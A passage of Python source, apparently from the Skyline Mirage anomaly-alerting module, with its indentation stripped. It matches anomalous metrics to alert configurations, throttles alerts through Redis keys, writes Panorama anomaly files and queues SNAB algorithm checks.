anomalous_metric = [value, base_name, metric_timestamp, triggered_algorithms, algorithms_run]
mirage_anomalous_metrics.append(anomalous_metric)
waterfall_alert_check_string = '%s.%s' % (str(metric_timestamp), base_name)
alerting_waterfall_alerts.append(waterfall_alert_check_string)
logger.info('waterfall alerting on %s' % base_name)
redis_waterfall_alert_key = 'mirage.waterfall.alert.%s' % waterfall_alert_check_string
try:
self.redis_conn.setex(redis_waterfall_alert_key, 300, waterfall_alert_check_timestamp)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add Redis key - %s for waterfall alert' % (
redis_waterfall_alert_key))
# @added 20200929 - Feature #3734: waterfall alerts
# Task #3748: POC SNAB
# Branch #3068: SNAB
# Added Panorama anomaly details for waterfall alerts
# Note:
# The values are enclosed in single quotes intentionally
# as the imp.load_source used results in a shift in the
# decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
logger.info('adding panorama anomaly file for waterfall alert on %s' % base_name)
panorama_data = None
try:
panorama_data = waterfall_alert[4]
from_timestamp = str(int(panorama_data[2]))
int_metric_timestamp = int(panorama_data[3])
algorithms_run = panorama_data[4]
triggered_algorithms = panorama_data[5]
source = panorama_data[7]
added_at = str(int(time()))
panaroma_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'app = \'%s\'\n' \
'source = \'%s\'\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(value), from_timestamp,
str(int_metric_timestamp), str(algorithms_run),
triggered_algorithms, skyline_app, source,
this_host, added_at)
logger.info('panorama anomaly data for waterfall alert - %s' % str(panorama_data))
# Create an anomaly file with details about the anomaly
sane_metricname = filesafe_metricname(str(base_name))
panaroma_anomaly_file = '%s/%s.%s.txt' % (
settings.PANORAMA_CHECK_PATH, added_at, sane_metricname)
try:
write_data_to_file(
skyline_app, panaroma_anomaly_file, 'w',
panaroma_anomaly_data)
logger.info('added panorama anomaly file for waterfall alert :: %s' % (panaroma_anomaly_file))
except:
logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file))
logger.error(traceback.format_exc())
redis_set = 'mirage.sent_to_panorama'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add panorama anomaly data file for waterfall alert')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add waterfall alert to alert on to mirage_anomalous_metrics')
# @added 20200913 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
# Info #1792: Shapelet extraction
snab_checks_sent = []
added_to_snab_at = int(time())
# @added 20200929 - Task #3748: POC SNAB
# Branch #3068: SNAB
# Added three-sigma snab.panorama items
panorama_added_at = int(time())
panorama_three_sigma_snab_added = []
# @added 20200610 - Feature #3560: External alert config
external_alerts = {}
external_from_cache = None
internal_alerts = {}
internal_from_cache = None
all_alerts = list(settings.ALERTS)
all_from_cache = None
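# all_alerts defaults to the internal settings.ALERTS tuples and is
# replaced by the merged internal and external alert configs when
# EXTERNAL_ALERTS is enabled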
if EXTERNAL_ALERTS:
try:
external_alerts, external_from_cache, internal_alerts, internal_from_cache, all_alerts, all_from_cache = get_external_alert_configs(skyline_app)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine external alert configs')
logger.info('retrieved %s external_alerts configurations from_cache %s, %s internal_alerts from_cache %s and %s all_alerts from_cache %s' % (
str(len(external_alerts)), str(external_from_cache),
str(len(internal_alerts)), str(internal_from_cache),
str(len(all_alerts)), str(all_from_cache)))
if LOCAL_DEBUG:
logger.debug('debug :: all_alerts :: %s' % str(all_alerts))
if not all_alerts:
logger.error('error :: all_alerts is not set, so creating from settings.ALERTS')
all_alerts = list(settings.ALERTS)
not_ionosphere_metrics = []
# @modified 20200610 - Feature #3560: External alert config
# for alert in settings.ALERTS:
for alert in all_alerts:
# @added 20181114 - Bug #2682: Reduce mirage ionosphere alert loop
not_an_ionosphere_metric_check_done = 'none'
if LOCAL_DEBUG:
logger.debug('debug :: %s metrics in mirage_anomalous_metrics' % str(len(mirage_anomalous_metrics)))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# for metric in self.anomalous_metrics:
for metric in mirage_anomalous_metrics:
# @added 20161228 - Feature #1830: Ionosphere alerts
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere
# metrics if Ionosphere is up
try:
metric_name = '%s%s' % (settings.FULL_NAMESPACE, str(metric[1]))
if LOCAL_DEBUG:
logger.debug('debug :: metric_name interpolated to %s' % str(metric_name))
except:
if LOCAL_DEBUG:
logger.error(traceback.format_exc())
logger.debug('debug :: failed to interpolate metric_name')
# @added 20200907 - Feature #3734: waterfall alerts
waterfall_alert_check_string = '%s.%s' % (str(int(metric[2])), metric[1])
# @modified 20200907 - Feature #3734: waterfall alerts
# if metric_name in ionosphere_unique_metrics:
if metric_name in ionosphere_unique_metrics and waterfall_alert_check_string not in alerting_waterfall_alerts:
# @added 20181114 - Bug #2682: Reduce mirage ionosphere alert loop
if not_alerting_for_ionosphere == metric_name:
continue
# @modified 20190408 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Only check Ionosphere is up once per cycle
# ionosphere_up = False
if not ionosphere_up:
try:
ionosphere_up = self.redis_conn.get('ionosphere')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere key: %s' % str(e))
if ionosphere_up:
# @modified 20190408 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Wrapped this block up on conditional based on
# ionosphere_alerts_returned
if not ionosphere_alerts_returned:
logger.info('not alerting - Ionosphere metric - %s' % str(metric[1]))
# @added 20181114 - Bug #2682: Reduce mirage ionosphere alert loop
not_alerting_for_ionosphere = metric_name
continue
else:
logger.error('error :: Ionosphere did not report up')
logger.info('taking over alerting from Ionosphere if alert is matched on - %s' % str(metric[1]))
else:
# @modified 20181114 - Bug #2682: Reduce mirage ionosphere alert loop
# logger.info('not an Ionosphere metric checking whether to alert - %s' % str(metric[1]))
if not_an_ionosphere_metric_check_done == metric_name:
# Do not log multiple times for this either
not_an_ionosphere_metric_check_done = metric_name
else:
if not ionosphere_alerts_returned:
if metric_name not in not_ionosphere_metrics:
logger.info('not an Ionosphere metric checking whether to alert - %s' % str(metric[1]))
not_an_ionosphere_metric_check_done = metric_name
not_ionosphere_metrics.append(metric_name)
# ALERT_MATCH_PATTERN = alert[0]
# METRIC_PATTERN = metric[1]
# @modified 20200622 - Task #3586: Change all alert pattern checks to matched_or_regexed_in_list
# Feature #3512: matched_or_regexed_in_list function
# Changed original alert matching pattern to use new
# method
base_name = str(metric[1])
try:
pattern_match, metric_matched_by = matched_or_regexed_in_list(skyline_app, base_name, [alert[0]])
if LOCAL_DEBUG and pattern_match:
logger.debug('debug :: %s matched alert - %s' % (base_name, alert[0]))
try:
del metric_matched_by
except:
pass
except:
pattern_match = False
if pattern_match:
# @added 20200610 - Feature #3560: External alert config
# @modified 20200624 - Feature #3560: External alert config
# Set the alert key to the external alerter id
# external_alerter_alerter = None
external_alerter_id = None
try:
if alert[4]['type'] == 'external':
# @modified 20200624 - Feature #3560: External alert config
# Set the alert key to the external alerter id
# external_alerter_alerter = alert[4]['alerter']
external_alerter_id = alert[4]['id'].replace('external-', '')
except:
external_alerter_id = None
# @modified 20200610 - Feature #3560: External alert config
# Use the all_alerts list which includes external alert configs
# cache_key = 'mirage.last_alert.%s.%s' % (alert[1], metric[1])
# @modified 20200624 - Feature #3560: External alert config
# Set the alert key to the external alerter id
# if external_alerter_alerter:
# cache_key = 'mirage.last_alert.%s.%s.%s' % (str(external_alerter_alerter), alert[1], metric[1])
if external_alerter_id:
cache_key = 'mirage.last_alert.%s.%s.%s' % (str(external_alerter_id), alert[1], metric[1])
else:
cache_key = 'mirage.last_alert.%s.%s' % (alert[1], metric[1])
try:
# @modified 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Changed the last_alert cache key to hold the last
# anomaly timestamp
# last_alert = self.redis_conn.get(cache_key)
last_alert = self.redis_conn_decoded.get(cache_key)
# @added 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Evaluate the reported anomaly timestamp to determine whether
# EXPIRATION_TIME should be applied to a batch metric
if last_alert:
# Is this a analyzer_batch related anomaly
analyzer_batch_anomaly = None
metric_timestamp = metric[2]
analyzer_batch_metric_anomaly_key = 'analyzer_batch.anomaly.%s.%s' % (
str(metric_timestamp), metric[1])
try:
analyzer_batch_anomaly = self.redis_conn_decoded.get(analyzer_batch_metric_anomaly_key)
except Exception as e:
logger.error(
'error :: could not query cache_key - %s - %s' % (
analyzer_batch_metric_anomaly_key, e))
analyzer_batch_anomaly = None
if analyzer_batch_anomaly:
logger.info('identified as an analyzer_batch triggered anomaly from the presence of the Redis key %s' % analyzer_batch_metric_anomaly_key)
else:
logger.info('not identified as an analyzer_batch triggered anomaly as no Redis key found - %s' % analyzer_batch_metric_anomaly_key)
if last_alert and analyzer_batch_anomaly:
last_timestamp = None
try:
last_timestamp = int(last_alert)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine last_timestamp from the last Mirage alert key - %s' % cache_key)
last_timestamp = None
seconds_between_batch_anomalies = None
if last_timestamp:
try:
seconds_between_batch_anomalies = int(metric_timestamp) - int(last_timestamp)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine seconds_between_batch_anomalies for batch metric Panorama key- %s' % cache_key)
last_timestamp = None
if seconds_between_batch_anomalies:
if seconds_between_batch_anomalies > int(alert[2]):
logger.info('the difference between the last anomaly timestamp (%s) and the batch anomaly timestamp (%s) for batch metric %s is greater than the metric EXPIRATION_TIME of %s' % (
str(last_timestamp), str(metric_timestamp), metric[1],
str(alert[2])))
logger.info('alerting on anomaly for batch metric %s, so setting last_alert to None' % (
metric))
last_alert = None
else:
logger.info('the difference between the last anomaly timestamp (%s) and the batch anomaly timestamp (%s) for batch metric %s is less than the metric EXPIRATION_TIME of %s, not alerting' % (
str(last_timestamp), str(metric_timestamp), metric[1],
str(alert[2])))
# @added 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Task #3562: Change panorama.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# If the metric is a batch processing metric and the anomaly
# timestamp is less than the last_check timestamp, alert on
# the anomaly
if int(metric_timestamp) < last_timestamp:
logger.info('batch anomaly timestamp (%s) less than the last_check timestamp (%s), alerting on anomaly for batch metric %s, so setting last_alert to None' % (
str(metric_timestamp), str(last_timestamp), metric))
last_alert = None
if not last_alert:
if ionosphere_alerts_returned:
# @modified 20190410 - Feature #2882: Mirage - periodic_check
# Only set if not set
try:
second_order_resolution_seconds + 1
set_second_order_resolution_seconds = False
except:
set_second_order_resolution_seconds = True
if set_second_order_resolution_seconds:
try:
second_order_resolution_seconds = int(metric[3]) * 3600
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine full_duration from the Ionosphere alert for %s' % (metric[1]))
logger.info('using settings.FULL_DURATION - %s' % (str(settings.FULL_DURATION)))
second_order_resolution_seconds = int(settings.FULL_DURATION)
# @modified 20190524 - Branch #3002
# Wrapped in try except
try:
# @modified 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Change the last_alert cache key to hold the
# the anomaly timestamp for which the alert
# was sent, not the packb anomaly value.
# Using the timestamp of the anomaly allows
# it to be used to determine if a batch
# anomaly should be alerted on based on the
# comparison of the timestamps rather than
# just the presence of the last_alert key
# based on it not having reach its TTL as
# analyzer_batch could send multiple
# anomalies in one batch that might be
# EXPIRATION_TIME apart.
# self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
self.redis_conn.setex(cache_key, str(alert[2]), int(metric[2]))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to set Redis key %s for %s' % (
str(cache_key), metric[1]))
# @added 20200929 - Task #3748: POC SNAB
# Branch #3068: SNAB
# Determine if this is a snab_check_metric so
# that info can be passed to the alerter
snab_check_metric = False
if SNAB_ENABLED:
for app in SNAB_CHECKS:
if app == skyline_app:
for snab_context in SNAB_CHECKS[app]:
if snab_check_metric:
break
if snab_context == 'testing':
for algorithm in SNAB_CHECKS[app][snab_context]:
try:
algorithm_source = SNAB_CHECKS[app][snab_context][algorithm]['algorithm_source']
except:
break
if not os.path.isfile(algorithm_source):
break
try:
for namespace in SNAB_CHECKS[app][snab_context][algorithm]['namespaces']:
if namespace in base_name:
snab_check_metric = True
break
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check if %s is a snab_check_metric' % base_name)
if snab_check_metric:
algorithm_group = 'three-sigma'
# @added 20201007 - Feature #3772: Add the anomaly_id to the http_alerter json
# Branch #3068: SNAB
# Added second_order_resolution_seconds, triggered_algorithms and algorithms_run
try:
triggered_algorithms = metric[4]
algorithms_run = metric[5]
except:
triggered_algorithms = []
algorithms_run = []
# @added 20201001 - Task #3748: POC SNAB
# Added anomalyScore
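# anomalyScore is calculated as the fraction of the algorithms run
# that triggered, defaulting to 1.0 when that cannot be determined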
try:
if triggered_algorithms and algorithms_run:
anomalyScore = len(triggered_algorithms) / len(algorithms_run)
else:
anomalyScore = 1.0
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine anomalyScore for %s' % base_name)
anomalyScore = 1.0
# @added 20201001 - Branch #3068: SNAB
# Task #3748: POC SNAB
# Added analysis_run_time
analysis_run_time = 0
redis_key = 'mirage.analysis_run_time.%s.%s' % (base_name, str(metric[2]))
try:
analysis_run_time_data = self.redis_conn_decoded.get(redis_key)
if analysis_run_time_data:
analysis_run_time = float(analysis_run_time_data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine analysis_run_time from Redis key - %s' % (
redis_key))
try:
snab_panorama_details = {
'metric': base_name,
'timestamp': int(metric[2]),
# @added 20201001 - Task #3748: POC SNAB
# Added anomalyScore and analysis_run_time
'anomalyScore': anomalyScore,
'analysis_run_time': analysis_run_time,
'source': skyline_app,
'algorithm_group': algorithm_group,
'algorithm': None,
'added_at': panorama_added_at,
}
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to create snab_panorama_details dict %s' % base_name)
snab_panorama_details = None
# Only send once for a metric and timestamp
if snab_panorama_details not in panorama_three_sigma_snab_added:
self.redis_conn.sadd('snab.panorama', str(snab_panorama_details))
logger.info('added snab.panorama three-sigma item - %s' % (
str(snab_panorama_details)))
panorama_three_sigma_snab_added.append(snab_panorama_details)
# trigger_alert(alert, metric, second_order_resolution_seconds, context)
try:
# @added 20210409 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Always determine triggered_algorithms and
# calculate anomalyScore
try:
triggered_algorithms = metric[4]
algorithms_run = metric[5]
except:
triggered_algorithms = []
algorithms_run = []
try:
if triggered_algorithms and algorithms_run:
anomalyScore = len(triggered_algorithms) / len(algorithms_run)
else:
anomalyScore = 1.0
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine anomalyScore for %s' % base_name)
anomalyScore = 1.0
if alert[1] != 'smtp':
new_alert = None
# @added 20201007 - Feature #3772: Add the anomaly_id to the http_alerter json
if 'http_alerter' in alert[1]:
anomaly_id = None
anomaly_id_redis_key = 'panorama.anomaly_id.%s.%s' % (
str(int(metric[2])), base_name)
try_get_anomaly_id_redis_key_count = 0
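# Panorama may not have created the anomaly id key yet, so retry up
# to 20 times, sleeping 1 second between attempts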
while try_get_anomaly_id_redis_key_count < 20:
try_get_anomaly_id_redis_key_count += 1
try:
anomaly_id = int(self.redis_conn_decoded.get(anomaly_id_redis_key))
break
except:
sleep(1)
if not anomaly_id:
logger.error('error :: failed to determine anomaly_id from Redis key - %s' % anomaly_id_redis_key)
else:
logger.info('determined anomaly_id as %s, appending to alert' % str(anomaly_id))
# Do not modify the alert list object, create a new one
new_alert = list(alert)
new_alert.append(['anomaly_id', anomaly_id])
# @added 20201130 - Feature #3772: Add the anomaly_id to the http_alerter json
# Determine the triggered_algorithms
# and algorithms_run
try:
triggered_algorithms = metric[4]
algorithms_run = metric[5]
except:
triggered_algorithms = []
algorithms_run = []
# @added 20201111 - Feature #3772: Add the anomaly_id to the http_alerter json
# Add the real anomalyScore
try:
if triggered_algorithms and algorithms_run:
anomalyScore = len(triggered_algorithms) / len(algorithms_run)
else:
anomalyScore = 1.0
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine anomalyScore for %s' % base_name)
anomalyScore = 1.0
new_alert.append(['anomalyScore', anomalyScore])
# @added 20200929 - Task #3748: POC SNAB
# Branch #3068: SNAB
# Determine if this is a snab_check_metric so
# that info can be passed to the alerter
if SNAB_ENABLED and snab_check_metric:
if alert[1] == 'slack':
anomaly_id = None
snab_id = None
snab_details = None
anomaly_id_redis_key = 'panorama.anomaly_id.%s.%s' % (
str(int(metric[2])), base_name)
try_get_anomaly_id_redis_key_count = 0
while try_get_anomaly_id_redis_key_count < 20:
try_get_anomaly_id_redis_key_count += 1
try:
anomaly_id = int(self.redis_conn_decoded.get(anomaly_id_redis_key))
break
except:
sleep(1)
if not anomaly_id:
logger.error('error :: failed to determine anomaly_id from Redis key - %s' % anomaly_id_redis_key)
if anomaly_id:
# snab_id_redis_key = 'snab.id.%s.%s.%s.%s' % (algorithm_group, str(metric_timestamp), base_name, panorama_added_at)
snab_id_redis_key = 'snab.id.%s.%s.%s.%s' % (algorithm_group, str(int(metric[2])), base_name, panorama_added_at)
try_get_snab_id_redis_key_count = 0
while try_get_snab_id_redis_key_count < 20:
try_get_snab_id_redis_key_count += 1
try:
snab_id = int(self.redis_conn_decoded.get(snab_id_redis_key))
break
except:
sleep(1)
if not snab_id:
logger.error('error :: failed to determine snab_id from Redis key - %s' % snab_id_redis_key)
snab_details = ['snab_details', snab_id, anomaly_id, anomalyScore]
# Do not modify the alert list object, create a new one
new_alert = list(alert)
new_alert.append(snab_details)
# @modified 20201008 - Feature #3772: Add the anomaly_id to the http_alerter json
# Feature #3734: waterfall alerts
# Branch #3068: SNAB
# Use the appropriate alert context
if new_alert:
logger.info('trigger_alert :: alert: %s, metric: %s, second_order_resolution_seconds: %s, context: %s' % (
str(new_alert), str(metric),
str(second_order_resolution_seconds),
str(alert_context)))
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
trigger_alert(new_alert, metric, second_order_resolution_seconds, alert_context, triggered_algorithms)
else:
logger.info('trigger_alert :: alert: %s, metric: %s, second_order_resolution_seconds: %s, context: %s' % (
str(alert), str(metric),
str(second_order_resolution_seconds),
str(alert_context)))
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
trigger_alert(alert, metric, second_order_resolution_seconds, alert_context, triggered_algorithms)
else:
logger.info('smtp_trigger_alert :: alert: %s, metric: %s, second_order_resolution_seconds: %s, context: %s' % (
str(alert), str(metric),
str(second_order_resolution_seconds),
str(alert_context)))
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
smtp_trigger_alert(alert, metric, second_order_resolution_seconds, alert_context, triggered_algorithms)
logger.info('sent %s alert: For %s' % (alert[1], metric[1]))
except Exception as e:
logger.error('error :: could not send %s alert for %s: %s' % (alert[1], metric[1], e))
# @added 20200913 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
# Info #1792: Shapelet extraction
if SNAB_ENABLED:
timeseries_dir = base_name.replace('.', '/')
training_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, str(int(metric[2])),
str(timeseries_dir))
anomaly_data = '%s/%s.json' % (training_dir, base_name)
check_full_duration = (int(alert[3]) * 60 * 60)
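# alert[3] appears to hold the second order resolution in hours for
# the namespace, converted here to a full duration in seconds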
# TODO:
# Due to how the matrixprofile identifies
# discords, if a metric triggers as
# anomalous with 3sigma it must be checked again
# for x window periods thereafter as
# matrixprofile may only identify a discord
# later when the time series changes again.
for app in SNAB_CHECKS:
if app == skyline_app and check_full_duration:
for snab_context in SNAB_CHECKS[app]:
if snab_context == 'testing':
for algorithm in SNAB_CHECKS[app][snab_context]:
try:
alert_slack_channel = SNAB_CHECKS[app][snab_context][algorithm]['alert_slack_channel']
except:
alert_slack_channel = None
try:
algorithm_source = SNAB_CHECKS[app][snab_context][algorithm]['algorithm_source']
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to verify algorithm_source for %s for the %s context' % (
algorithm, snab_context))
break
if not os.path.isfile(algorithm_source):
logger.error('error :: algorithm_source file %s does not exist for %s for the %s context' % (
algorithm_source, algorithm, snab_context))
break
try:
algorithm_parameters = SNAB_CHECKS[app][snab_context][algorithm]['algorithm_parameters']
except:
algorithm_parameters = {}
try:
max_execution_time = SNAB_CHECKS[app][snab_context][algorithm]['max_execution_time']
except:
max_execution_time = 1.0
try:
algo_debug_logging = SNAB_CHECKS[app][snab_context][algorithm]['debug_logging']
except:
algo_debug_logging = False
try:
for namespace in SNAB_CHECKS[app][snab_context][algorithm]['namespaces']:
if namespace in base_name:
snab_check_details = {
'metric': base_name,
'timestamp': int(metric[2]),
'original_anomaly_timestamp': int(metric[2]),
'value': metric[0],
'full_duration': check_full_duration,
'anomaly_data': anomaly_data,
'source': 'mirage',
'added_at': added_to_snab_at,
'original_added_at': added_to_snab_at,
'context': snab_context,
'algorithm': algorithm,
'algorithm_source': algorithm_source,
'algorithm_parameters': algorithm_parameters,
'max_execution_time': max_execution_time,
'debug_logging': algo_debug_logging,
'alert_slack_channel': alert_slack_channel,
'processed': None,
'analysed': None,
'anomalous': None,
'anomalyScore': None,
'snab_only': False,
}
add_snab_check = True
if base_name in snab_checks_sent:
add_snab_check = False
break
if add_snab_check:
self.redis_conn.sadd('snab.work', str(snab_check_details))
logger.info('added snab check for %s with algorithm %s for alerter %s' % (
base_name, algorithm, str(alert[1])))
snab_checks_sent.append(base_name)
break
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check and add check_details to snab.work Redis set if required')
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
redis_set = 'mirage.waterfall_alerts.sent_to_ionosphere'
# @added 20200905 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
redis_set = 'mirage.waterfall_alerts.sent_to_ionosphere'
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
if waterfall_alert[0] == metric:
if int(waterfall_alert[1]) == metric_timestamp:
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_set))
# TODO - Add anomaly to Panorama when a waterfall alert triggers
else:
logger.info('alert Redis key %s exists not alerting for %s' % (str(cache_key), metric[1]))
except Exception as e:
logger.error('error :: could not query Redis for cache_key - %s' % e)
# @added 20200916 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
snab_only_checks = []
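# snab_only checks appear to be items queued for analysis by SNAB
# algorithms only, independent of the Mirage alerting handled above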
if SNAB_ENABLED:
try:
literal_mirage_snab_only_checks = list(self.redis_conn_decoded.smembers(mirage_snab_only_checks_redis_set))
for snab_only_check_string in literal_mirage_snab_only_checks:
snab_only_check = literal_eval(snab_only_check_string)
snab_only_checks.append(snab_only_check)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine list from %s Redis set' % str(mirage_snab_only_checks_redis_set))
snab_only_checks = []
if not snab_only_checks:
logger.info('there are no snab_only_checks')
if snab_only_checks:
snab_only_checks_sent = []
for alert in all_alerts:
for snab_check in snab_only_checks:
try:
metric = snab_check['metric']
anomaly_data = snab_check['anomaly_data']
anomaly_timestamp = snab_check['timestamp']
original_anomaly_timestamp = snab_check['original_anomaly_timestamp']
value = snab_check['value']
original_added_at = snab_check['original_added_at']
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get details from snab_only_checks snab_check dict - %s' % str(snab_check))
try:
pattern_match, metric_matched_by = matched_or_regexed_in_list(skyline_app, metric, [alert[0]])
if LOCAL_DEBUG and pattern_match:
logger.debug('debug :: %s matched alert - %s' % (base_name, alert[0]))
try:
del metric_matched_by
except:
pass
except:
pattern_match = False
if pattern_match:
check_full_duration = (int(alert[3]) * 60 * 60)
for app in SNAB_CHECKS:
if app == skyline_app and check_full_duration:
for snab_context in SNAB_CHECKS[app]:
if snab_context == 'testing':
for algorithm in SNAB_CHECKS[app][snab_context]:
try:
alert_slack_channel = SNAB_CHECKS[app][snab_context][algorithm]['alert_slack_channel']
except:
alert_slack_channel = None
try:
algorithm_source = SNAB_CHECKS[app][snab_context][algorithm]['algorithm_source']
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to verify algorithm_source for %s for the %s context' % (
algorithm, snab_context))
break
if not os.path.isfile(algorithm_source):
logger.error('error :: algorithm_source file %s does not exist for %s for the %s context' % (
algorithm_source, algorithm, snab_context))
break
try:
algorithm_parameters = SNAB_CHECKS[app][snab_context][algorithm]['algorithm_parameters']
except:
algorithm_parameters = {}
try:
max_execution_time = SNAB_CHECKS[app][snab_context][algorithm]['max_execution_time']
except:
max_execution_time = 1.0
try:
algo_debug_logging = SNAB_CHECKS[app][snab_context][algorithm]['debug_logging']
except:
algo_debug_logging = False
try:
for namespace in SNAB_CHECKS[app][snab_context][algorithm]['namespaces']:
if namespace in metric:
snab_check_details = {
'metric': metric,
'timestamp': int(anomaly_timestamp),
'original_anomaly_timestamp': int(original_anomaly_timestamp),
'value': value,
'full_duration': check_full_duration,
'anomaly_data': anomaly_data,
'source': 'mirage',
'added_at': added_to_snab_at,
'original_added_at': original_added_at,
'context': snab_context,
'algorithm': algorithm,
'algorithm_source': algorithm_source,
'algorithm_parameters': algorithm_parameters,
'max_execution_time': max_execution_time,
'debug_logging': algo_debug_logging,
'alert_slack_channel': alert_slack_channel,
'processed': None,
'analysed': None,
'anomalous': None,
'anomalyScore': None,
'snab_only': True,
}
add_snab_check = True
if metric in snab_only_checks_sent:
add_snab_check = False
break
if add_snab_check:
self.redis_conn.sadd('snab.work', str(snab_check_details))
logger.info('added snab_only check for %s with algorithm %s for alerter %s' % (
metric, algorithm, str(alert[1])))
snab_only_checks_sent.append(metric)
break
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check and add check_details to snab.work Redis set if required')
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
mirage_not_anomalous_metrics = []
try:
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# literal_mirage_not_anomalous_metrics = list(self.redis_conn.smembers('mirage.not_anomalous_metrics'))
literal_mirage_not_anomalous_metrics = list(self.redis_conn_decoded.smembers('mirage.not_anomalous_metrics'))
for metric_list_string in literal_mirage_not_anomalous_metrics:
metric = literal_eval(metric_list_string)
mirage_not_anomalous_metrics.append(metric)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine list from mirage.not_anomalous_metrics Redis set')
mirage_not_anomalous_metrics = []
if settings.NEGATE_ANALYZER_ALERTS:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if len(self.anomalous_metrics) == 0:
if len(mirage_anomalous_metrics) == 0:
# @modified 20200610 - Feature #3560: External alert config
# for negate_alert in settings.ALERTS:
for negate_alert in all_alerts:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# for not_anomalous_metric in self.not_anomalous_metrics:
for not_anomalous_metric in mirage_not_anomalous_metrics:
NEGATE_ALERT_MATCH_PATTERN = negate_alert[0]
NOT_ANOMALOUS_METRIC_PATTERN = not_anomalous_metric[1]
alert_match_pattern = re.compile(NEGATE_ALERT_MATCH_PATTERN)
negate_pattern_match = alert_match_pattern.match(NOT_ANOMALOUS_METRIC_PATTERN)
if negate_pattern_match:
try:
logger.info('negate alert sent for %s' % (not_anomalous_metric[1]))
trigger_negater(negate_alert, not_anomalous_metric, second_order_resolution_seconds, metric_value)
except Exception as e:
logger.error('error :: could not send alert: %s' % e)
# Log progress
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if len(self.anomalous_metrics) > 0:
if len(mirage_anomalous_metrics) > 0:
logger.info('seconds since last anomaly :: %.2f' % (time() - now))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# logger.info('total anomalies :: %d' % len(self.anomalous_metrics))
logger.info('total anomalies :: %d' % len(mirage_anomalous_metrics))
logger.info('exception stats :: %s' % str(exceptions))
logger.info('anomaly breakdown :: %s' % str(anomaly_breakdown))
# Log to Graphite
if process_metric_check_files:
run_time = time() - run_timestamp
